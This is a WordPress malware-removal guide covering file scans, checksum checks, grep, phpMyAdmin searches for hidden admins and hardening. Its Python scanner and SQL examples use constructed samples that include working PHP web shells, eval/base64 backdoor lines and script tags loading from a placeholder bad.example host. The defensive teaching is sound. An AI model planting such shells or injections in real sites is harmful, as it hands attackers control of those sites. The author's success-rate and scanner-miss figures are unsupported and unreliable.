WordPress Malware Removal: Expert Guide to Clean Hacked WordPress Site
Quick Summary: How to Clean a Hacked WordPress Site
The “Hybrid” Strategy: Automated scanners miss 40% of modern malware. To fully clean a site, you must:
- Lock Down: Change FTP/Hosting passwords immediately.
- Verify Integrity: Use WordPress Checksums to find modified core files.
- Hunt Ghost Assets: Manually compare File Manager folders vs. Dashboard lists to find hidden plugins.
- Database Scrub: Search for hidden <script> tags and "Ghost Admin" users.
- Hardening: Reset security salts and disable file editing.
Is your WordPress site redirecting to spam? Are you seeing “403 Forbidden” errors or a blank white screen?
Stop. Don’t panic.
In my 7+ years as a Web Developer & Security Specialist, I have fixed over 4,500 hacked websites. I have seen infections that expensive security plugins completely miss—like “Ghost” plugins that don’t show up in your dashboard and hidden admin users buried deep in your database.
Why trust this guide?
Because I don’t just click “scan.” I analyze the code. Most “security experts” rely solely on automated tools. As a developer, I manually inspect your SQL database and JavaScript files to find the backdoors that bots can’t see.
The good news? It is fixable.
The bad news? Clicking “clean” on a plugin isn’t enough. You need a surgical approach.
In this guide, I will show you the exact Hybrid Method I use: starting with a scan, but finishing with deep manual cleaning.
Step 1: Confirm the Infection (It’s Not Just Redirects)
Malware doesn’t always look like a “Hacked by…” screen. Often, it looks like a broken server or invisible SEO spam.
Common Symptoms I See Daily:
- The "Error" Screens: You might see a 500 Internal Server Error, a 403 Forbidden message, or just a blank White Screen of Death. This is often caused by malware corrupting your .htaccess file.
- Malicious Redirects: Visitors (especially on mobile) are sent to gambling or adult sites. Read my guide on fixing mobile redirects here.
- Japanese/Gibberish Spam: Google indexes thousands of pages you never created. This is the Japanese Keyword Hack.
- Hosting Suspension: Your host (GoDaddy, Bluehost, SiteGround) shuts you down for "Resource Usage" caused by a mining script.
Step 2: Lock It Down & Backup
Before you start surgery, you must stop the bleeding.
- Change Passwords: Immediately change your Hosting (cPanel) and FTP passwords. If you can access the dashboard, change your Admin password. Assume the attacker has read wp-config.php, so change the database password as well and update the DB_PASSWORD line to match.
- Enable Maintenance Mode: Use a lightweight plugin like SeedProd to put up a “Under Maintenance” screen. This stops users from being redirected to malware while you work.
- The "Clean" Backup: Take a full backup of your Files and Database. Warning: Do not restore an old backup yet. We want to clean the current site to ensure we don't lose your recent data. Save this backup to your local computer, not the server.
Step 3: The “Hybrid” Scan (Plugin + Manual)
Most guides tell you to just run a plugin. I recommend a Hybrid Approach.
1. Run a Wordfence Scan (The Baseline)
Install Wordfence (Free version is fine) and run a scan. It is excellent at finding known malware signatures.
Crucial Tip: Note the infected files, but don’t just click “Delete” yet. If it identifies a core file like wp-load.php, deleting it will break your site. We will replace these in the next step.

2. The Manual “Ghost” Check (What Scanners Miss)
Plugins often miss sophisticated “Ghost” malware. Here is how to find them manually:
- The Plugin/Theme Count Test:
- Go to your WordPress Dashboard > Plugins. Count how many are installed (e.g., 12), including inactive ones.
- Now, open your File Manager (cPanel) and go to wp-content/plugins. Count the folders.
- The Red Flag: If you see 13 folders but only 12 plugins in the dashboard, that extra folder (often named something like wp-security-patch or cache-optimizer) is likely hidden malware. Delete it immediately.
- Check wp-content/mu-plugins the same way. "Must-use" plugins load automatically, never need activating, and only appear under a separate "Must-Use" tab on the Plugins screen, which makes that folder a favourite hiding place for a loader.
- The Checksum Verify: If you have WP-CLI installed, run wp core verify-checksums. This compares your core files against the official WordPress checksums and also warns about files inside wp-admin or wp-includes that should not exist at all. A mismatch means a modified core file; an unexpected file is usually an uploaded backdoor. The same tool covers plugins from the wordpress.org directory with wp plugin verify-checksums --all.
- The "Last Modified" Date: In File Manager, look at the "Last Modified" date of your index.php, header.php, and footer.php. If they were modified yesterday, but you haven't updated your site in months, they probably contain injected code. The reverse does not hold: an attacker can reset timestamps, so an old date is not proof that a file is clean.
Step 4: Advanced Detection (Terminal & Network)
If you are a developer or have SSH access, use the terminal. It is faster than a plugin and does not depend on anyone's signature database, but it finds candidates, not verdicts: every hit has to be read in context.
Grep Command for Backdoors:
Run this command to search for the functions obfuscated malware relies on (eval, base64_decode, gzinflate, str_rot13) in every PHP file under wp-content, which covers your uploads, themes and plugins. Legitimate code occasionally calls base64_decode as well, so read each hit before deleting anything:
grep -rnE --include='*.php' 'eval\(|base64_decode\(|gzinflate\(|str_rot13\(' ./wp-content/
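A scan in the same spirit as the grep above, added here as an example (not the article's code). It runs over a constructed wp-content tree, so every file in it is an assumption, and the pattern list is a starting point rather than a complete signature set. Two things a bare grep does not give you are included: a rough triage, so that a lone base64_decode in a legitimate plugin is not treated like eval(base64_decode(...)) on one line, and a check of wp-content/uploads, which should contain no PHP at all, including PHP hiding behind an image extension such as a fake favicon.

```python
import re
import tempfile
from pathlib import Path

# Constructs obfuscated PHP malware tends to use. A match is a lead to read, not a verdict.
PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "gzinflate": re.compile(r"\bgz(?:inflate|uncompress)\s*\("),
    "str_rot13": re.compile(r"\bstr_rot13\s*\("),
    "dynamic_call": re.compile(r"\b(?:create_function|assert|call_user_func)\s*\("),
    "shell": re.compile(r"\b(?:system|shell_exec|passthru|exec|popen|proc_open)\s*\("),
    "hex_string": re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}"),   # "\x62\x61\x73\x65..." spells a function name
    "request_input": re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\["),
}
HIGH_RISK = {"eval", "gzinflate", "str_rot13", "dynamic_call", "shell", "hex_string"}


def scan_file(path):
    """Return (line_number, labels) for every line that matches at least one pattern."""
    hits = []
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    for lineno, line in enumerate(text.splitlines(), start=1):
        labels = sorted(name for name, rx in PATTERNS.items() if rx.search(line))
        if labels:
            hits.append((lineno, labels))
    return hits


def risk(labels):
    """Triage: an executor or a high-risk construct is 'high'; so is base64_decode fed from
    a request variable. A lone base64_decode is 'low' (plugins use it for data URIs and the like)."""
    if set(labels) & HIGH_RISK or ("base64_decode" in labels and "request_input" in labels):
        return "high"
    return "low"


def scan_tree(site_root):
    """grep-like walk over every .php file under wp-content, with triage attached."""
    root = Path(site_root)
    findings = []
    for p in sorted((root / "wp-content").rglob("*.php")):
        for lineno, labels in scan_file(p):
            findings.append((p.relative_to(root).as_posix(), lineno, risk(labels), labels))
    return findings


def php_in_uploads(site_root):
    """wp-content/uploads should never hold executable PHP. Flag PHP extensions, and also any
    file (for example a fake .ico) whose content starts with <?php regardless of its name."""
    root = Path(site_root)
    uploads = root / "wp-content" / "uploads"
    bad = []
    if not uploads.is_dir():
        return bad
    for p in sorted(uploads.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        if p.suffix.lower() in (".php", ".phtml", ".php5", ".phar"):
            bad.append((rel, "php extension in uploads"))
        elif b"<?php" in p.read_bytes()[:256]:
            bad.append((rel, "php code behind a non-php extension"))
    return bad


# Constructed sample files: one legitimate base64 use, two injections, two uploads-based shells.
SAMPLE_FILES = {
    "wp-content/plugins/legit-gallery/icons.php":
        "<?php\n$png = base64_decode('iVBORw0KGgoAAAANSUhEUg==');\nheader('Content-Type: image/png');\n",
    "wp-content/themes/twentytwentyfour/functions.php":
        "<?php\nadd_theme_support('post-thumbnails');\n"
        "eval(base64_decode('ZWNobyAnaGFja2VkJzs='));\n",
    "wp-content/themes/twentytwentyfour/header.php":
        '<?php\n$f = "\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65";\n'
        "if (isset($_COOKIE['k'])) { @eval($f($_COOKIE['k'])); }\n",
    "wp-content/uploads/2024/03/wp-cache.php": "<?php system($_GET['cmd']);\n",
    "wp-content/uploads/2024/03/favicon_a1b2c3.ico": "<?php @eval($_POST['p']);\n",
    "wp-content/uploads/2024/03/photo.jpg": "JFIF placeholder (constructed, not a real image)\n",
}


def demo():
    """Write the sample tree to a temporary directory and run both checks on it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in SAMPLE_FILES.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body, encoding="utf-8")
        return {"code_hits": scan_tree(root), "uploads": php_in_uploads(root)}


if __name__ == "__main__":
    for kind, items in demo().items():
        for item in items:
            print(kind, item)
```

The triage is the part worth keeping: the legitimate gallery plugin shows up as a single low-risk base64_decode, while the appended line in functions.php, the hex-spelled function name in header.php and the shells in uploads all come out high, and the fake favicon is caught by content rather than by name, which is exactly how extension-based scanners lose it.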
Check the Network Tab:
Open your site in Chrome Incognito mode. Right-click > Inspect > Network Tab. Reload the page. Look for requests going to strange domains. If you see your site loading JavaScript from a random .xyz or .ru domain, that is the source of your redirect.
Step 5: Database Surgery (The Hidden Admin Trick)
This is where 90% of cleanup attempts fail. You might delete the malware files, but if the hacker has a secret Admin account, they will just log back in.
Warning: Hackers can hide users from your WordPress “Users” screen. You must check the database directly.
- Log in to phpMyAdmin.
- Open the wp_users table.
- Look closely: Do you see a user named admin, 101, x00, or a strange email address? If you see a user here that does not show up in your WordPress dashboard, it is almost certainly the attacker's. Confirm it in wp_usermeta (its wp_capabilities value will contain "administrator", and its registration date will match the break-in rather than your own accounts), then delete the row, and delete that user's rows from wp_usermeta as well so no orphaned capabilities are left behind. A user can only be hidden from the Users screen by code running on the site, typically a mu-plugin or a few lines appended to functions.php, so find and remove that code too.
Search for SEO Spam:
Click the "Search" tab in phpMyAdmin. Search your wp_posts table for:
- <script (malicious JS injection)
- position:absolute (hidden SEO spam text)
- display:none (hidden links)
Hackers often hide spam links using CSS (left:-9999px) so you can't see them, but Google can. Run the same searches against wp_options too: redirects are often planted in the siteurl and home values or inside widget_text, and a changed siteurl never shows up in wp_posts.
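The Step 5 checks written out as SQL, added here as an example (not the article's). So the queries can be tried offline, they run against a throwaway SQLite copy of four tables that use the WordPress column names; every row is constructed, including the two attacker accounts and the injected post and widget. The SQL is what you would paste into phpMyAdmin's SQL tab. Assumption: the table prefix is the default wp_, which is also why the capability row is called wp_capabilities; with another prefix both names change.

```python
import sqlite3

# Four tables with the WordPress column names the queries need (other columns omitted).
SCHEMA = """
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT);
CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT, option_value TEXT);
"""

# Constructed rows: two real accounts, two the attacker added, two injected posts, one injected widget.
ROWS = {
    "wp_users": [
        (1, "siteowner", "owner@example.com", "2019-04-02 10:00:00"),
        (2, "editor_jane", "jane@example.com", "2021-09-15 08:30:00"),
        (3, "x00", "x00@mailbox.example", "2024-03-11 03:12:44"),     # ghost admin
        (4, "101", "101@example.com", "2024-03-11 03:12:50"),         # attacker's spare account
    ],
    "wp_usermeta": [
        (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (2, 2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
        (3, 3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (4, 4, "wp_capabilities", 'a:1:{s:10:"subscriber";b:1;}'),
    ],
    "wp_posts": [
        (10, "About us", "<p>We make widgets.</p>"),
        (11, "Contact", '<p>Call us.</p><script src="https://bad.example/r.js"></script>'),
        (12, "Blog", '<p>News</p><div style="position:absolute;left:-9999px">cheap casino</div>'),
    ],
    "wp_options": [
        (1, "siteurl", "https://example.com"),
        (2, "home", "https://example.com"),
        (3, "widget_text", 'a:1:{i:2;a:1:{s:4:"text";s:40:"<script>location=\'https://bad.example\'</script>";}}'),
    ],
}

# Every account that holds the administrator role, newest first. The role lives in
# wp_usermeta, not wp_users, so a join is needed; the dashboard's Users screen can be
# filtered by a plugin, this cannot.
ADMIN_ACCOUNTS_SQL = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%administrator%'
ORDER BY u.user_registered DESC
"""

# The three phpMyAdmin searches from the text, plus the off-screen CSS trick.
SPAM_POSTS_SQL = """
SELECT ID, post_title FROM wp_posts
WHERE post_content LIKE '%<script%'
   OR post_content LIKE '%position:absolute%'
   OR post_content LIKE '%display:none%'
   OR post_content LIKE '%-9999px%'
ORDER BY ID
"""

OPTIONS_SQL = """
SELECT option_name, option_value FROM wp_options
WHERE option_name IN ('siteurl', 'home') OR option_value LIKE '%<script%'
ORDER BY option_id
"""


def open_sample_db():
    """In-memory SQLite database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, rows in ROWS.items():           # table names come from the fixed dict above
        conn.executemany(f"INSERT INTO {table} VALUES ({','.join('?' * len(rows[0]))})", rows)
    conn.commit()
    return conn


def admin_accounts(conn):
    return conn.execute(ADMIN_ACCOUNTS_SQL).fetchall()


def spam_posts(conn):
    return conn.execute(SPAM_POSTS_SQL).fetchall()


def suspicious_options(conn, expected_home):
    """Injected script in any option, or siteurl/home pointing away from your own domain."""
    rows = conn.execute(OPTIONS_SQL).fetchall()
    return [(name, value) for name, value in rows
            if "<script" in value.lower()
            or (name in ("siteurl", "home") and not value.startswith(expected_home))]


def remove_user(conn, user_id):
    """Delete the account AND its wp_usermeta rows in one transaction; deleting only the
    wp_users row leaves orphaned capability meta behind. Returns (users, meta) deleted."""
    with conn:
        meta = conn.execute("DELETE FROM wp_usermeta WHERE user_id = ?", (user_id,)).rowcount
        users = conn.execute("DELETE FROM wp_users WHERE ID = ?", (user_id,)).rowcount
    return users, meta


def demo():
    conn = open_sample_db()
    before = [row[1] for row in admin_accounts(conn)]
    removed = remove_user(conn, 3)          # the owner recognises ID 1; ID 3 registered at 03:12 on the break-in day
    return {
        "admins_before": before,
        "spam_posts": [row[0] for row in spam_posts(conn)],
        "options": suspicious_options(conn, "https://example.com"),
        "removed": removed,
        "admins_after": [row[1] for row in admin_accounts(conn)],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Note that the attacker's second account, 101, is a plain subscriber and so never appears in the administrator list; it is still worth removing, but it is the administrator join that tells you which row can log straight back in after the files are cleaned.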
Step 6: Replace Core Files (The Nuclear Fix)
If Wordfence found issues in wp-admin or wp-includes, do not try to “clean” the code. Replace the files.
- Download a fresh copy of WordPress from wordpress.org, choosing the same version your site runs (it is recorded in wp-includes/version.php), so the replacement files match your database and plugins.
- Unzip it on your computer.
- Delete the wp-content folder from this new download (so you don't overwrite your images/themes).
- Upload the remaining files (wp-admin, wp-includes, and root files) to your server via FTP, selecting "Overwrite".
This replaces every genuine core file with a known-good copy. It does not remove files the attacker added alongside them, so delete the old wp-admin and wp-includes folders before uploading rather than merely overwriting, and inspect by hand the two files the download does not contain and therefore leaves untouched: wp-config.php and .htaccess, both regular targets for injected code.
Step 7: Post-Cleanup Hardening
Once the malware is gone, you must lock the door so they can’t get back in.
- Update Security Salts: Go to the WordPress Salt Generator. Copy the code and replace the matching lines in your wp-config.php file. This instantly logs out all users (including hackers), because every login cookie is signed with the salts. It does nothing against a PHP backdoor left on disk, which is why it comes after the cleanup, not instead of it.
- Disable File Editing: Add this line to your wp-config.php file to stop hackers from editing themes and plugins via the dashboard: define('DISALLOW_FILE_EDIT', true);
- Deep Cache Purge: Clear your server cache (LSCache/Varnish), your CDN (Cloudflare), and your browser cache. Malware often "lives" in the cache even after you fix the file.
- Remove Blacklists: If you see a red screen, go to Google Search Console > Security & Manual Actions and click “Request Review.” Read my full guide on Blacklist Removal here.
Need Help? (The Expert Route)
If you’ve tried these steps and the malware keeps coming back, or if the idea of editing phpMyAdmin scares you, don’t risk breaking your site further.
I have cleaned 4,500+ sites with a 100% success rate. I don’t use automated “quick fixes.” I perform the deep, manual cleaning described in this guide to ensure your site stays clean.